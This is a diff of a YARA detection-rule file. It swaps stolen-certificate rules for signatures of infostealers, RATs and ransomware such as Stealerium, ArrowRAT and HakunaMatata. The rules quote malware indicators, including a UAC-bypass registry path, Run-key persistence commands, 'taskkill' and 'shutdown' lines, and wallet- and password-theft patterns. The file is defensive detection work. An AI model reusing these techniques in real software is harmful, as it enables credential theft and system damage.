 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bf5282687f4707bc16d388361ddc0af1102df0d29066ece0b57215fcf9fdcc94"
+		logic_hash = "d7f802f233b2b4ff2c250bb8e96649f307bbb3457c78004751401b3ea7f531a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b2c70d30c0b34bfeffb8a9cb343e5cad5f6bcbf7"
-		importance = 20
+
+	strings:
+		$s1 = "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\TaskKill" fullword wide
+		$s2 = "KoiVM" ascii
+		$s3 = "RunpeX.Stub.Framework" wide
+		$s4 = "ExceptionServices.ExceptionDispatchInfo" wide
+		$s5 = "Kernel32.Dll" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORGLE DVORSAK, d.o.o" and pe.signatures [ i ] . serial == "00:a4:96:bc:77:45:75:c3:1a:be:c8:61:b6:8c:36:dc:b6" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ea720222D92Dc8D48E3B3C3B0Fc360A6 : FILE
+rule DITEKSHEN_MALWARE_Win_Cyberstealer : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CyberStealer infostealer"
 		author = "ditekSHen"
-		id = "2e43e98a-61f8-5f93-a415-52cb6453620d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "cb02013f-ffb2-5a17-9d6e-1d19b0e98fb8"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3867-L3878"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9920-L9941"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "97b2699d4cb0fd88e3440ea82dd6ea87cdac69c6ba2acd884f5aef577b55e79d"
+		logic_hash = "72413b68fa1381656202165dcd878761727e7caf0f15ccd65f3f2f842243a1f6"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		thumbprint = "522d0f1ca87ef784994dfd63cb0919722dfdb79f"
-		importance = 20
+
+	strings:
+		$x1 = "\\Cyber Stealer\\" ascii
+		$s1 = "[Virtualization]" fullword wide
+		$s2 = "\"encryptedPassword\":\"([^\"]+)\"" fullword wide
+		$s3 = "CreditCard" fullword ascii
+		$s4 = "DecryptPassword" fullword ascii
+		$s5 = "_modTime" fullword ascii
+		$s6 = "_pathname" fullword ascii
+		$s7 = "_pathnameInZip" fullword ascii
+		$s8 = "GetBookmarksDBPath" fullword ascii
+		$s9 = "GrabberImages" fullword ascii
+		$r1 = "^1[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide
+		$r2 = "^3[a-km-zA-HJ-NP-Z1-9]{25,34}$" wide
+		$r3 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" wide
+		$r4 = "^(?!:\\/\\/)([a-zA-Z0-9-_]+\\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\\.[a-zA-Z]{2,11}?$" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CAVANAGH NETS LIMITED" and pe.signatures [ i ] . serial == "00:ea:72:02:22:d9:2d:c8:d4:8e:3b:3c:3b:0f:c3:60:a6" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $r* ) ) ) or 7 of ( $s* ) or ( 5 of ( $s* ) and 2 of ( $r* ) ) or ( all of ( $r* ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_333Ca7D100B139B0D9C1A97Cb458E226 : FILE
+rule DITEKSHEN_MALWARE_Win_Arrowrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ArrowRAT"
 		author = "ditekSHen"
-		id = "dd5b3eb8-81c0-570d-9ec8-6a55eb7864f9"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "14d3aabe-1ef5-599f-adbd-61b580099447"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3880-L3891"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9943-L9961"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4519127b975d93297cca9b465ad88b3d38ad0fce0de182246dca3f000e2438be"
+		logic_hash = "13e6d4fd274f75c50aa4110276812d02885c03cfc269dde480db66955e5f703a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d618cf7ef3a674ff1ea50800b4d965de0ff463cb"
-		importance = 20
+
+	strings:
+		$s1 = "29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb" wide
+		$s2 = "Software\\Classes\\ms-settings\\shell\\open\\command" wide
+		$s3 = "DelegateExecute" fullword wide
+		$s4 = "powershell" wide
+		$s5 = "DESKTOP_HOOKCONTROL" fullword ascii
+		$s6 = "PROCESS_INFORMATION" fullword ascii
+		$s7 = "STARTUP_INFORMATION" fullword ascii
+		$s8 = /(Venom|Pandora)\shVNC/ fullword wide
+		$s9 = "cmd.exe /k START" fullword wide
+		$s10 = "ExclusionWD" fullword ascii
+		$s11 = "WinExec" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FSE, d.o.o." and pe.signatures [ i ] . serial == "33:3c:a7:d1:00:b1:39:b0:d9:c1:a9:7c:b4:58:e2:26" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_58Ec8821Aa2A3755E1075F73321756F4 : FILE
+rule DITEKSHEN_MALWARE_Win_Ducktail : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects DuckTail"
 		author = "ditekSHen"
-		id = "efa0e5c6-773a-5740-b7f9-ec10a92b1623"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "2d1a8f9e-ed5f-53fa-8ba8-b6d1344f6d39"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3893-L3904"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9963-L9991"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b79f161c77cbae0bec55fb2b047983660c84d2bb93db8c91cb6c22fd4ad197cc"
+		logic_hash = "a416212e5f87b33fdc14590c3d6d6ebc2915c2b383adf78d660c9408beb2323f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "19dd0d7f2edf32ea285577e00dd13c966844cfa4"
-		importance = 20
+
+	strings:
+		$s1 = "&global_scope_id=" wide
+		$s2 = "#ResolveMyIpAll" wide
+		$s3 = "#ApproveInvitesHandler" wide
+		$s4 = "#ProcessShareCok" wide
+		$s5 = "#InviteEmpHandler" wide
+		$s6 = "__activeScenarioIDs=%" wide
+		$s7 = "&__a=1&fb_dtsg=" wide
+		$s8 = "adAccountLimit\":(.*?)}" wide
+		$s9 = "|PUSH|" fullword wide
+		$s10 = "|SCREEN|" fullword wide
+		$s11 = "|SCREEC|" fullword wide
+		$s12 = "_ad_accounts>k__" ascii
+		$s13 = "get_Pwds" fullword ascii
+		$s14 = "Telegram.Bot" ascii
+		$s15 = { 2f 00 7b 00 43 00 59 00 52 00 7d 00 2e 00 74 00
+               78 00 74 00 00 15 2f 00 7b 00 4c 00 4f 00 47 00
+               7d 00 2e 00 74 00 78 00 74 00 00 15 2f 00 7b 00
+               43 00 46 00 47 00 7d 00 2e 00 74 00 78 00 74 00
+               00 15 2f 00 7b 00 50 00 52 00 53 00 7d 00 2e 00
+               74 00 78 00 74 00 00 15 2f 00 7b 00 53 00 43 00
+               52 00 7d 00 2e 00 6a 00 70 00 67 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cbebbfeaddcbcccffdcdc" and pe.signatures [ i ] . serial == "58:ec:88:21:aa:2a:37:55:e1:07:5f:73:32:17:56:f4" )
+		uint16( 0 ) == 0x5a4d and 13 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0940Fa9A4080F35052B2077333769C2F : FILE
+rule DITEKSHEN_MALWARE_Win_Grum : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect Grum spam bot"
 		author = "ditekSHen"
-		id = "2cc722de-97ff-53d1-9436-dc88c844186b"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "e9abaed1-f462-5099-b310-9f9244c0c8a2"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3906-L3917"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L9993-L10007"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3ecf6982c779a5fd867fef4b753313e379151491fa8865e8ae20f0c9362431a2"
+		logic_hash = "42a1d57dcddda4a24037af136caace6110b90ee5702c7c01d2a77d2676048c74"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "da154c058cd75ff478b248701799ea8c683dd7a5"
-		importance = 20
+
+	strings:
+		$s1 = "loader_id" fullword ascii
+		$s2 = "start_srv" fullword ascii
+		$s3 = "lid_file_upd" fullword ascii
+		$s4 = "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX" fullword ascii
+		$s5 = "rcpt to:<%s>" fullword ascii
+		$s6 = "ehlo %s" fullword ascii
+		$s7 = "%OUTLOOK_BND_" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PROFF LAIN, OOO" and pe.signatures [ i ] . serial == "09:40:fa:9a:40:80:f3:50:52:b2:07:73:33:76:9c:2f" )
+		( uint16( 0 ) == 0x5a4d and 5 of them ) or ( all of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_56Fff139Df5Ae7E788E5D72196Dd563A : FILE
+rule DITEKSHEN_MALWARE_Win_Dlinjector07 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader injector"
 		author = "ditekSHen"
-		id = "7cdca79f-5bf3-5768-b034-4d3bb177ffc9"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "244ad6fb-8769-5b57-84e2-66f51fccb32a"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3919-L3930"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10009-L10025"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "022fd24ba023dba06f1c63d1d1c90d17dc82b060d634a27b237d37e37455964f"
+		logic_hash = "aef43b59ef7d0d62a853280ec1588a48d6c21da5218b7fd7e6ab1aa0f048896b"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "0f69ccb73a6b98f548d00f0b740b6e42907efaad"
-		importance = 20
+
+	strings:
+		$x1 = "23lenrek[||]lldtn[||]daerhTemuseR[||]txetnoCdaerhTteS46woW[||]txetnoCdaerhTteS[||]txetnoCdaerhTteG46woW[||]txetnoCdaerhTteG[||]xEcollAlautriV[||]yromeMssecorPetirW[||]yromeMssecorPdaeR[||]noitceSfOweiVpamnUwZ[||]AssecorPetaerC" wide
+		$l1 = "[||]" wide
+		$r1 = "yromeMssecorPetirW" wide
+		$r2 = "xEcollAlautriV" wide
+		$r3 = "daerhTemuseR" ascii wide
+		$r4 = "noitceSfOweiVpamnUwZ" wide
+		$s1 = "Debugger Detected" fullword wide
+		$s2 = "payload" fullword ascii
+		$s3 = "_ENABLE_PROFILING" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cifromatika LLC" and pe.signatures [ i ] . serial == "56:ff:f1:39:df:5a:e7:e7:88:e5:d7:21:96:dd:56:3a" )
+		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or ( 1 of ( $l* ) and 2 of ( $r* ) ) or 6 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_03D433Fdc2469E9Fd878C80Bc0545147 : FILE
+rule DITEKSHEN_MALWARE_Win_Stealerium : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Stealerium infostealer"
 		author = "ditekSHen"
-		id = "4f793397-2768-5b34-a9f5-9100dccfa80e"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "ea137900-3add-54b4-9ce9-bc7e98f86d41"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3932-L3943"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10027-L10042"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fde125138ade8ab1a61544b90160f2c1d4bba3a09ffcf828768f98d925ab91c6"
+		logic_hash = "a2834e7fe26ad0197a9e490ab517029ceed2e09506fcc37e6ddf0c1804fa6cb9"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "64e90267e6359060a8669aebb94911e92bd0c5f3"
-		importance = 20
+
+	strings:
+		$x1 = "Stealerium" ascii wide
+		$x2 = /\.Target\.(Passwords|Messengers|Browsers|VPN|Gaming)\./ ascii
+		$x3 = /\.Modules\.(Keylogger|Implant|Passwords|Messengers|Browsers|VPN|Gaming|Clipper)\./ ascii
+		$s1 = "Timeout /T 2 /Nobreak" fullword wide
+		$s2 = "Directory not exists" wide
+		$s3 = "### {0} ### ({1})" wide
+		$s4 = /---\s(AntiAnalysis|WebcamScreenshot|Keylogger|Clipper)/ wide
+		$s5 = " *Keylogger " fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xEC\\xA3\\xBC\\xEC\\x8B\\x9D\\xED\\x9A\\x8C\\xEC\\x82\\xAC \\xEC\\x97\\x98\\xEB\\xA6\\xAC\\xEC\\x8B\\x9C\\xEC\\x98\\xA8\\xEB\\x9E\\xA9" and pe.signatures [ i ] . serial == "03:d4:33:fd:c2:46:9e:9f:d8:78:c8:0b:c0:54:51:47" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 2 of ( $x* ) and all of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0Be3F393D1Ef0272Aed0E2319C1B5Dd0 : FILE
+rule DITEKSHEN_MALWARE_Linux_Gobrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects GobRAT"
 		author = "ditekSHen"
-		id = "2be05341-c7a2-58fd-9211-8d3a912a7d5c"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "0561fa99-24ee-5e02-ba54-17a1dd81daa4"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3945-L3956"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10044-L10062"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a7ff863b07d5ce011bdbcf86a3f562e8201926c138848544559bd1d16597ff95"
+		logic_hash = "070687c909b066e38f72b6421b77670e87476d7e1eb1ed8d41d027836629eb71"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7745253a3f65311b84d8f64b74f249364d29e765"
-		importance = 20
+
+	strings:
+		$x1 = "BotList" ascii
+		$x2 = "BotCount" ascii
+		$x3 = "/etc/services/zone/bot.log" ascii
+		$x4 = "aaa.com/bbb/me" ascii
+		$s1 = "encoding/gob." ascii
+		$s2 = ".GetMacAddress" ascii
+		$s3 = ".IpString2Uint32" ascii
+		$s4 = ".RegisterLogFile" ascii
+		$s5 = ".UniqueAppendString" ascii
+		$s6 = ".NewDaemon" ascii
+		$s7 = ".SimpleCommand" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Invincea, Inc." and pe.signatures [ i ] . serial == "0b:e3:f3:93:d1:ef:02:72:ae:d0:e2:31:9c:1b:5d:d0" )
+		uint16( 0 ) == 0x457f and ( 3 of ( $x* ) or ( 2 of ( $x* ) and 3 of ( $s* ) ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or all of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_65628C146Ace93037Fc58659F14Bd35F : FILE
+rule DITEKSHEN_MALWARE_Win_Hakunamatata : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects HakunaMatata ransomware"
 		author = "ditekSHen"
-		id = "9104836a-3385-5b78-9e1d-705b7ed4b721"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "43ca40bb-9eb6-558e-977d-f1fff5659565"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3958-L3969"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10064-L10084"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a6b4cc307d6e6f4d5d275ef0765a7082216b1d277c9b1328abe7cb2c2497e411"
+		logic_hash = "b49705845e5440c3c1e47e196592ca2b31319d1af5265f2f954d3367e3d39d5c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b59165451be46b8d72d09191d0961c755d0107c8"
-		importance = 20
+
+	strings:
+		$s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s2 = "(?:[13]{1}[a-km-zA-HJ-NP-Z1-9]{26,33}|bc1[a-z0-9]{39,59})" wide
+		$s3 = "<RSAKeyValue><Modulus>" wide
+		$s4 = "HAKUNA MATATA" ascii wide
+		$s5 = "EXCEPTIONAL_FILE" ascii
+		$s6 = "TRIPLE_ENCRYPT" ascii
+		$s7 = "FULL_ENCRYPT" ascii
+		$s8 = "TARGETED_EXTENSIONS" ascii
+		$s9 = "CHANGE_PROCESS_NAME" ascii
+		$s10 = "KILL_APPS_ENCRYPT_AGAIN" ascii
+		$s11 = "<ALL_DRIVES>b__" ascii
+		$s12 = "dataToEncrypt" ascii
+		$s13 = "<RECURSIVE_DIRECTORY_LOOK>" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ESET, spol. s r.o." and pe.signatures [ i ] . serial == "65:62:8c:14:6a:ce:93:03:7f:c5:86:59:f1:4b:d3:5f" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0084817E07288A5025B9435570E7Fec1D3 : FILE
+rule DITEKSHEN_MALWARE_Win_Hakunamatata_Builder : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects HakunaMatata ransomware builder"
 		author = "ditekSHen"
-		id = "31528b27-4a0c-5e97-b201-07e89248196a"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "dbf3490f-418c-5d3b-9f9e-e9fb29d8b652"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3971-L3982"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10086-L10104"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "89da849911c6d6a3b6d45166bd9975828887b50ee149dea4cbae9cc5c0ecf6d2"
+		logic_hash = "ac258851de38504cf63ba51fd06f8a9a3dfbe0096d199ba702e9763b5ecc43e4"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "f22e8c59b7769e4a9ade54aee8aaf8404a7feaa7"
-		importance = 20
+
+	strings:
+		$s1 = "ENCRYPT FILES IN PROCESS" wide
+		$s2 = "#TARGET_FILES" ascii wide
+		$s3 = "HAKUNA MATATA" ascii wide nocase
+		$s4 = "#PRIVATE_KEY" ascii wide
+		$s5 = "/target:winexe /platform:anycpu /optimize+" wide
+		$s6 = "/win32icon:" fullword wide
+		$s7 = "SkippedFolders" ascii
+		$s8 = "RECURSIVE_DIRECTORY_LOOK(" ascii
+		$s9 = "DRAW_WALLPAPER(" ascii
+		$s10 = "startupKey.SetValue(MESSAGE_FILE.Split('.')[0], executablePath);" ascii
+		$s11 = /\\obj\\(Debug|Release)\\Hakuna\sMatata\.pdb/ ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE8\\xB4\\xBC\\xE8\\x89\\xBE\\xE5\\xBE\\xB7\\xE8\\xB4\\xBC\\xE6\\x8F\\x90\\xD0\\xAD\\xD0\\xAD\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE8\\xB4\\xBC\\xD0\\xAD\\xE5\\xBE\\xB7\\xE8\\xB4\\xBC\\xE8\\xB4\\xBC\\xE5\\xB0\\x94\\xE6\\x8F\\x90\\xE8\\x89\\xBE\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE5\\xB0\\x94\\xE6\\x8F\\x90\\xE8\\xB4\\xBC\\xE8\\x89\\xBE\\xD0\\xAD\\xE8\\x89\\xBE" and pe.signatures [ i ] . serial == "00:84:81:7e:07:28:8a:50:25:b9:43:55:70:e7:fe:c1:d3" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4D26Bab89Fcf7Ff9Fa4Dc4847E563563 : FILE
+rule DITEKSHEN_MALWARE_Win_Twarbot : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detect TWarBot IRC Bot"
 		author = "ditekSHen"
-		id = "168281bf-35ad-542a-adb4-20d719e31e2d"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "3acae103-c8d8-5959-83fd-f47d33da350b"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3984-L3995"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10106-L10121"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3eadf6eda2819101a370688d636250085915be3ebf1b3dec7a86d12a6a5ce681"
+		logic_hash = "6b1b0b92d2ea7adec58a4b0ac712384542d96dc8707b6f1f13df2d8150a03a7a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2be34a7a39df38f66d5550dcfa01850c8f165c81"
-		importance = 20
+
+	strings:
+		$x1 = "TWarBot" fullword ascii
+		$s1 = "PRIVMSG #" ascii
+		$s2 = "C:\\marijuana.txt" fullword ascii
+		$s3 = "C:\\rar.bat" fullword ascii
+		$s4 = "C:\\zip.bat" fullword ascii
+		$s5 = "software\\microsoft\\windows\\currentversion\\app paths\\winzip32.exe" ascii
+		$s6 = "software\\microsoft\\windows\\currentversion\\app paths\\WinRAR.exe" ascii
+		$s7 = "a -idp -inul -c- -m5" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "qvarn pty ltd" and pe.signatures [ i ] . serial == "4d:26:ba:b8:9f:cf:7f:f9:fa:4d:c4:84:7e:56:35:63" )
+		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 3 of ( $s* ) ) or 5 of ( $s* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00D9D419C9095A79B1F764297Addb935Da : FILE
+rule DITEKSHEN_MALWARE_Win_G0Crypt : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects G0Crypt / BRG0SNet / NovaGP ransomware"
 		author = "ditekSHen"
-		id = "7c45a78c-2cde-5200-81fd-239effef7fe6"
-		date = "2020-11-19"
-		modified = "2024-10-04"
+		id = "c0dd8a1b-1aa6-50be-92c4-125eabaf3f9f"
+		date = "2020-11-06"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3997-L4008"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L10123-L10156"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dd35b48752eec01e1bfff182410da9a857735e0052e9c1a0d7c366dbee808d3c"
+		logic_hash = "a678bbb02b82c34fb5e7bdce2e60b0da88f12b094e7ca3b74345814d0da5ce42"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "7d45ec21c0d6fd0eb84e4271655eb0e005949614"
-		importance = 20
+
+	strings:
+		$x1 = "G0Crypt/go/" ascii
+		$x2 = "BRG0SNet" ascii
+		$x3 = "/NovaGroup" ascii
+		$x4 = "novagroup@onionmail.org" ascii nocase
+		$x5 = "# Nova Group" ascii
+		$f1 = "main.HaveRun" ascii
+		$f2 = "main.FindFile" ascii
+		$f3 = "main.deriveKey" ascii
+		$f4 = "main.Pwd" fullword ascii
+		$f5 = "/ClearBashFile" ascii
+		$f6 = "/ClearUserTempFiles" ascii
+		$f7 = "/KillProccess" ascii
+		$f8 = "/Encryptor" ascii
+		$f9 = "/NoDirEncrypt" ascii
+		$f10 = "/RunCmdEexecutable" ascii
+		$f11 = "/StopImportantServices" ascii
+		$f12 = "/GetPwd" ascii
+		$s1 = "\\$Recycle.Bin"
+		$s2 = ".README.txt"
+		$s3 = "\\BRSPATH.exe"
+		$s4 = "taskkill /F /IM sql*"
+		$s5 = "C:\\inetpub\\logs\\"
+		$s6 = "shutdown /r"
+		$s7 = ":\\Program Files\\VMware\\"
+		$s8 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Message /t REG_SZ /d"
+		$s9 = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v DelLogSoft /t REG_SZ /d"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Nova soft" and pe.signatures [ i ] . serial == "00:d9:d4:19:c9:09:5a:79:b1:f7:64:29:7a:dd:b9:35:da" )
